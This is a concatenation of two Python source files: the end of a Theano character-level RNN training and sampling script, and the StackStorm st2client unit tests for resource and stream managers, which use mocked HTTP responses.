        num_train_batches = -(-x_ix.shape[0] // self.batch_size)
        print 'Training started'
        train_cost_history = []
        if valid is not None:
            valid_cost_history = []
        for e in range(epochs):
            avg_cost = 0
            for bidx in range(num_train_batches):
                batch_x = x_ix[bidx * self.batch_size: (bidx + 1) * self.batch_size]
                # the train function expects (seq_length, batch_size)
                batch_cost = self.train_fn(batch_x.transpose([1, 0]))
                train_cost_history.append(float(batch_cost))
                if np.isnan(batch_cost):
                    print 'NaN cost detected. Abort'
                    return
                avg_cost += batch_cost
            avg_cost /= num_train_batches
            if valid is not None:
                valid_cost = float(self.cost_fn(valid_ix[:, None]))
                valid_cost_history.append(valid_cost)
                # NOTE(review): this branch prints epoch 'e' while the
                # else-branch below prints 'e + 1' — inconsistent numbering.
                print 'Epoch: {} Train Loss: {:.4f} Valid Loss: {:.4f}'.format(e, avg_cost, valid_cost)
                if checkpoint_freq > 0 and (e + 1) % checkpoint_freq == 0:
                    # pickle to save the current state of training
                    chk_path = os.path.join(checkpoints_dir, 'charrnn_vanilla_{}_epoch{}_t{:.4f}_v{:.4f}.pkl'.format(len(self.rnn_layers), e, avg_cost, valid_cost))
                    state = {
                        'epoch': e,
                        'train_cost_history': train_cost_history,
                        'valid_cost_history': valid_cost_history,
                        'train_cost': avg_cost,
                        'valid_cost': valid_cost,
                        'params': self.export_params(),
                        'vocab': self.vocab,
                        'rnn_layers': self.rnn_layers,
                        'batch_size': self.batch_size,
                        'learning_rate': self.learning_rate,
                        'dropout_p_hidden': self.dropout_p_hidden,
                        'momentum': self.momentum,
                        'grad_clip': self.grad_clip,
                    }
                    pkl.dump(state, open(chk_path, 'wb'), pkl.HIGHEST_PROTOCOL)
                    print 'Written checkpoint:', chk_path
            else:
                print 'Epoch: {} Train Loss: {:.4f}'.format(e + 1, avg_cost)
            if (e + 1) % sample_freq == 0:
                print '\nSampled string:\n{}\n'.format(self.sample(seed_string=''))

    def init_from(self, checkpoint):
        """Restore vocabulary, configuration and parameters from a
        checkpoint pickle produced by fit()."""
        state = pkl.load(open(checkpoint, 'rb'))
        # import the vocabulary
        self.vocab = state['vocab']
        self.ch_to_ix = {ch: i for i, ch in enumerate(self.vocab)}
        self.ix_to_ch = {v: k for k, v in self.ch_to_ix.iteritems()}
        self.vocab_size = len(self.vocab)
        # import the network configuration
        self.rnn_layers = state['rnn_layers']
        self.batch_size = state['batch_size']
        self.learning_rate = state['learning_rate']
        self.dropout_p_hidden = state['dropout_p_hidden']
        self.momentum = state['momentum']
        self.grad_clip = state['grad_clip']
        # import the network parameters
        self.params = self.init()
        self.import_params(state['params'])
        # force recompilation against the restored parameters
        self.train_fn, self.sample_fn = None, None

    def sample(self, sample_length=100, sampling_temp=1.0, seed_string='', use_sampling=True):
        """
        Generate sample_length characters from the trained network,
        optionally bootstrapped with seed_string.
        """
        if self.params is None:
            print 'Run fit() or init_from() before sampling'
            return
        if self.sample_fn is None:
            # symbolic variable for the softmax temperature
            x = T.ivector()
            temp = T.scalar()
            # store the state of the rnn into a dedicated shared variable per layer
            self.H = []
            for i in range(len(self.rnn_layers)):
                self.H.append(theano.shared(value=np.zeros((1, 1, self.rnn_layers[i]), dtype=theano.config.floatX), borrow=True, name='H_{}'.format(i)))
            # build the sampler
            y_hat_sample, H_new = self.model_sample(x, self.H, temp)
            # update each hidden state in the rnn
            updates = OrderedDict()
            for i in range(len(self.rnn_layers)):
                updates[self.H[i]] = H_new[i]
            # define the sampling function
            self.sample_fn = theano.function(inputs=[x, temp], outputs=y_hat_sample, updates=updates)
        # ensure that the rnn state is set to zero
        for i in range(len(self.rnn_layers)):
            self.H[i].set_value(np.zeros((1, 1, self.rnn_layers[i]), dtype=theano.config.floatX), borrow=True)
        if len(seed_string) == 0:
            # start from an uniformly sampled character
            seed_string = self.ix_to_ch[self.numpy_rng.randint(self.vocab_size)]
        # bootstrap the rnn using the seed_string
        for ch in seed_string:
            next_char_proba = self.sample_fn([self.ch_to_ix[ch]], sampling_temp).squeeze()
        sampled_str = []
        # start the real sampling from the rnn
        for i in range(sample_length):
            if use_sampling:
                # draw the next character from the predicted distribution
                ch_ix = self.numpy_rng.choice(self.vocab_size, p=next_char_proba)
            else:
                # greedy decoding: always take the most likely character
                ch_ix = np.argmax(next_char_proba)
            sampled_str.append(self.ix_to_ch[ch_ix])
            next_char_proba = self.sample_fn([ch_ix], sampling_temp).squeeze()
        return seed_string + ''.join(sampled_str)
from sys import argv
if __name__ == '__main__':
    # Train a character-level RNN on the text file given as the first
    # command-line argument.
    input_file = argv[1]
    x = open(input_file, 'r').read()
    # 90/5/5 train/validation/test split over the raw character stream
    train_size = int(0.9 * len(x))
    valid_size = int(0.05 * len(x))
    train_x = x[:train_size]
    valid_x = x[train_size:train_size+valid_size]
    test_x = x[train_size+valid_size:]
    # checkpoints go into a directory named after the input file (no extension)
    checkpoints_dir = os.path.splitext(os.path.basename(input_file))[0]
    model = VanillaCharRNN(
        rnn_layers=[256, 256],
        batch_size=100,
        grad_clip=5.0,
        dropout_p_hidden=0.0,
        learning_rate=0.01,
        momentum=0.5)
    t0 = time.time()
    model.fit(train_x, valid=valid_x, epochs=100, seq_length=100, checkpoints_dir=checkpoints_dir)
    print 'Training completed in {:.2f} sec'.format(time.time() - t0)
|
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import mock
import json
import logging
import unittest2
from tests import base
from st2client import models
from st2client.utils import httpclient
LOG = logging.getLogger(__name__)
class TestSerialization(unittest2.TestCase):
    """Round-trip checks for FakeResource serialize()/deserialize()."""

    def test_resource_serialize(self):
        """serialize() emits the canonical dict representation."""
        resource = base.FakeResource(id="123", name="abc")
        self.assertDictEqual(resource.serialize(), base.RESOURCES[0])

    def test_resource_deserialize(self):
        """deserialize() restores attributes from a dict payload."""
        resource = base.FakeResource.deserialize(base.RESOURCES[0])
        self.assertEqual(resource.id, "123")
        self.assertEqual(resource.name, "abc")
class TestResourceManager(unittest2.TestCase):
    """Tests for ResourceManager/StreamManager HTTP behavior.

    Every test patches the relevant httpclient.HTTPClient verb with a
    MagicMock returning a canned FakeResponse, so no network I/O occurs.
    """

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, "OK")
        ),
    )
    def test_resource_get_all(self):
        """get_all() deserializes every resource in the response body."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resources = mgr.get_all()
        actual = [resource.serialize() for resource in resources]
        expected = json.loads(json.dumps(base.RESOURCES))
        self.assertListEqual(actual, expected)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, "OK")
        ),
    )
    def test_resource_get_all_with_limit(self):
        """get_all(limit=...) still returns the deserialized resources."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resources = mgr.get_all(limit=50)
        actual = [resource.serialize() for resource in resources]
        expected = json.loads(json.dumps(base.RESOURCES))
        self.assertListEqual(actual, expected)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_get_all_failed(self):
        """get_all() raises on a 5xx response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        self.assertRaises(Exception, mgr.get_all)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
        ),
    )
    def test_resource_get_by_id(self):
        """get_by_id() deserializes the single resource in the response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resource = mgr.get_by_id("123")
        actual = resource.serialize()
        expected = json.loads(json.dumps(base.RESOURCES[0]))
        self.assertEqual(actual, expected)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
    )
    def test_resource_get_by_id_404(self):
        """get_by_id() returns None (not an error) on 404."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resource = mgr.get_by_id("123")
        self.assertIsNone(resource)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_get_by_id_failed(self):
        """get_by_id() raises on a 5xx response.

        A concrete id is passed so the failure comes from the HTTP layer;
        calling assertRaises without the argument would be satisfied by the
        missing-argument TypeError, making the test vacuous.
        """
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        self.assertRaises(Exception, mgr.get_by_id, "123")

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {}
            )
        ),
    )
    def test_resource_query(self):
        """query() deserializes the matching resources."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resources = mgr.query(name="abc")
        actual = [resource.serialize() for resource in resources]
        expected = json.loads(json.dumps([base.RESOURCES[0]]))
        self.assertEqual(actual, expected)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {"X-Total-Count": "50"}
            )
        ),
    )
    def test_resource_query_with_count(self):
        """query_with_count() also surfaces the X-Total-Count header."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resources, count = mgr.query_with_count(name="abc")
        actual = [resource.serialize() for resource in resources]
        expected = json.loads(json.dumps([base.RESOURCES[0]]))
        self.assertEqual(actual, expected)
        self.assertEqual(count, 50)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {}
            )
        ),
    )
    def test_resource_query_with_limit(self):
        """query(limit=...) still returns the deserialized resources."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resources = mgr.query(name="abc", limit=50)
        actual = [resource.serialize() for resource in resources]
        expected = json.loads(json.dumps([base.RESOURCES[0]]))
        self.assertEqual(actual, expected)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                "", 404, "NOT FOUND", {"X-Total-Count": "30"}
            )
        ),
    )
    def test_resource_query_404(self):
        """query() returns an empty list (not an error) on 404."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resources = mgr.query(name="abc")
        self.assertListEqual(resources, [])

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                "", 404, "NOT FOUND", {"X-Total-Count": "30"}
            )
        ),
    )
    def test_resource_query_with_count_404(self):
        """query_with_count() returns ([], None) on 404."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resources, count = mgr.query_with_count(name="abc")
        self.assertListEqual(resources, [])
        self.assertIsNone(count)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_query_failed(self):
        """query() raises on a 5xx response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        self.assertRaises(Exception, mgr.query, name="abc")

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {}
            )
        ),
    )
    def test_resource_get_by_name(self):
        """get_by_name() returns the single matching resource."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resource = mgr.get_by_name("abc")
        actual = resource.serialize()
        expected = json.loads(json.dumps(base.RESOURCES[0]))
        self.assertEqual(actual, expected)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
    )
    def test_resource_get_by_name_404(self):
        """get_by_name() returns None (not an error) on 404."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        resource = mgr.get_by_name("abc")
        self.assertIsNone(resource)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, "OK")
        ),
    )
    def test_resource_get_by_name_ambiguous(self):
        """get_by_name() raises when more than one resource matches."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        self.assertRaises(Exception, mgr.get_by_name, "abc")

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_get_by_name_failed(self):
        """get_by_name() raises on a 5xx response.

        A concrete name is passed so the failure comes from the HTTP layer
        rather than from a missing-argument TypeError, which would also
        satisfy assertRaises and make the test vacuous.
        """
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        self.assertRaises(Exception, mgr.get_by_name, "abc")

    @mock.patch.object(
        httpclient.HTTPClient,
        "post",
        mock.MagicMock(
            return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
        ),
    )
    def test_resource_create(self):
        """create() POSTs the instance and returns the created resource."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = base.FakeResource.deserialize('{"name": "abc"}')
        resource = mgr.create(instance)
        self.assertIsNotNone(resource)

    @mock.patch.object(
        httpclient.HTTPClient,
        "post",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_create_failed(self):
        """create() raises on a 5xx response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = base.FakeResource.deserialize('{"name": "abc"}')
        self.assertRaises(Exception, mgr.create, instance)

    @mock.patch.object(
        httpclient.HTTPClient,
        "put",
        mock.MagicMock(
            return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
        ),
    )
    def test_resource_update(self):
        """update() PUTs the instance and returns the updated resource."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        text = '{"id": "123", "name": "cba"}'
        instance = base.FakeResource.deserialize(text)
        resource = mgr.update(instance)
        self.assertIsNotNone(resource)

    @mock.patch.object(
        httpclient.HTTPClient,
        "put",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_update_failed(self):
        """update() raises on a 5xx response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        text = '{"id": "123", "name": "cba"}'
        instance = base.FakeResource.deserialize(text)
        self.assertRaises(Exception, mgr.update, instance)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {}
            )
        ),
    )
    @mock.patch.object(
        httpclient.HTTPClient,
        "delete",
        mock.MagicMock(return_value=base.FakeResponse("", 204, "NO CONTENT")),
    )
    def test_resource_delete(self):
        """delete() succeeds silently on a 204 response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = mgr.get_by_name("abc")
        mgr.delete(instance)

    @mock.patch.object(
        httpclient.HTTPClient,
        "delete",
        mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
    )
    def test_resource_delete_404(self):
        """delete() tolerates a 404 (already gone) without raising."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = base.FakeResource.deserialize(base.RESOURCES[0])
        mgr.delete(instance)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {}
            )
        ),
    )
    @mock.patch.object(
        httpclient.HTTPClient,
        "delete",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_delete_failed(self):
        """delete() raises on a 5xx response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = mgr.get_by_name("abc")
        self.assertRaises(Exception, mgr.delete, instance)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {}
            )
        ),
    )
    @mock.patch.object(
        httpclient.HTTPClient,
        "delete",
        mock.MagicMock(return_value=base.FakeResponse("", 204, "NO CONTENT")),
    )
    def test_resource_delete_action(self):
        """delete_action() succeeds silently on a 204 response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = mgr.get_by_name("abc")
        mgr.delete_action(instance, True)

    @mock.patch.object(
        httpclient.HTTPClient,
        "delete",
        mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
    )
    def test_resource_delete_action_404(self):
        """delete_action() tolerates a 404 without raising."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = base.FakeResource.deserialize(base.RESOURCES[0])
        mgr.delete_action(instance, False)

    @mock.patch.object(
        httpclient.HTTPClient,
        "get",
        mock.MagicMock(
            return_value=base.FakeResponse(
                json.dumps([base.RESOURCES[0]]), 200, "OK", {}
            )
        ),
    )
    @mock.patch.object(
        httpclient.HTTPClient,
        "delete",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_delete_action_failed(self):
        """delete_action() raises on a 5xx response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        instance = mgr.get_by_name("abc")
        self.assertRaises(Exception, mgr.delete_action, instance, True)

    @mock.patch("requests.get")
    @mock.patch("sseclient.SSEClient")
    def test_stream_resource_listen(self, mock_sseclient, mock_requests):
        """StreamManager.listen() yields parsed SSE payloads and forwards
        the cacert as requests' `verify` kwarg when one is configured."""
        mock_msg = mock.Mock()
        mock_msg.data = json.dumps(base.RESOURCES)

        # Case 1: a 'cacert' is supplied -> verify=<path> must be passed.
        def side_effect_checking_verify_parameter_is():
            return [mock_msg]

        mock_sseclient.return_value.events.side_effect = (
            side_effect_checking_verify_parameter_is
        )
        mgr = models.StreamManager("https://example.com", cacert="/path/ca.crt")
        resp = mgr.listen(events=["foo", "bar"])
        self.assertEqual(list(resp), [base.RESOURCES])
        call_args = tuple(["https://example.com/stream?events=foo%2Cbar"])
        call_kwargs = {"stream": True, "verify": "/path/ca.crt"}
        self.assertEqual(mock_requests.call_args_list[0][0], call_args)
        self.assertEqual(mock_requests.call_args_list[0][1], call_kwargs)

        # Case 2: no 'cacert' -> no verify kwarg at all.
        def side_effect_checking_verify_parameter_is_not():
            return [mock_msg]

        mock_sseclient.return_value.events.side_effect = (
            side_effect_checking_verify_parameter_is_not
        )
        mgr = models.StreamManager("https://example.com")
        resp = mgr.listen()
        self.assertEqual(list(resp), [base.RESOURCES])
        call_args = tuple(["https://example.com/stream?"])
        call_kwargs = {"stream": True}
        self.assertEqual(mock_requests.call_args_list[1][0], call_args)
        self.assertEqual(mock_requests.call_args_list[1][1], call_kwargs)

    @mock.patch.object(
        httpclient.HTTPClient,
        "post",
        mock.MagicMock(
            return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
        ),
    )
    def test_resource_clone(self):
        """clone() POSTs and returns the cloned resource."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        source_ref = "spack.saction"
        resource = mgr.clone(source_ref, "dpack", "daction", False)
        self.assertIsNotNone(resource)

    @mock.patch.object(
        httpclient.HTTPClient,
        "post",
        mock.MagicMock(
            return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
        ),
    )
    def test_resource_clone_failed(self):
        """clone() raises on a 5xx response."""
        mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
        source_ref = "spack.saction"
        self.assertRaises(Exception, mgr.clone, source_ref, "dpack", "daction")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.